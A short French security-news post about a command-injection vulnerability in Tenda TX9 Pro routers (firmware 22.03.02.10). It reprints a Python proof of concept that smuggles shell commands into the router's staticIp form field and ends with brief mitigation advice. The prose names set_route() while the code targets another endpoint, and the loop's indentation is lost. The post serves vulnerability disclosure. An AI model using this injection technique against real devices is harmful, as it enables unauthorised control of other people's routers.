Tenda est un fabricant chinois , dont on commence à souvent parler sur ce site et pas en bien surtout pour ceux qui est de la cybersécurité.
Aujourd’hui encore il nous gratifie d’une énorme faille CVE sur un équipement réseau.
La faille de cybersécurité touche les Tenda TX9 Pro ayant la version firmware : 22.03.02.10
Il est possible d’injecter des commandes systèmes (OS) via la fonction set_route().
Vous trouverez plus d informations sur ce Github :
https://github.com/H4niz/Vulnerability/blob/main/Tenda-TX9-V22.03.02.10-19042022-3.md
Et voici le bout de code du POC.
POC de la Faille CVE sur TENDA TX9 Pro
#-*- encoding: utf8 -*-
#-*- encoding: utf8 -*-
import requests
# Product: Tenda Router
# Related products:TX9 ProUpdate Date:2021/12/24
# Hardware Version:V1.0
# Software Version:V22.03.02.10
# Command Injection
url = "http://192.168.1.13/goform/fast_setting_internet_set"
cmds = ["touch /tmp/h4niz", "id >> /tmp/h4niz"]
for i in cmds:
p = '192.168.1.13$(`{}`)'.format(i)
payload = {'netWanType': '0', 'dns1': '8.8.8.8', 'dns2': '1.1.1.1', 'staticIp': p, 'wanType': '1', 'mask': '255.255.255.0', 'gateway': '192.168.1.1', 'adslUser': '', 'adslPwd': '', 'action': 'connect'}
r = requests.post(url, data=payload)
print(r.status_code)
print(r.content)
Comment améliorer la cybersécurité
En terme de contre-mesures pour le moment , vérifiez déjà que votre équipement n’est pas accessible depuis internet et faites la mise à jour dès qu elle sera disponible.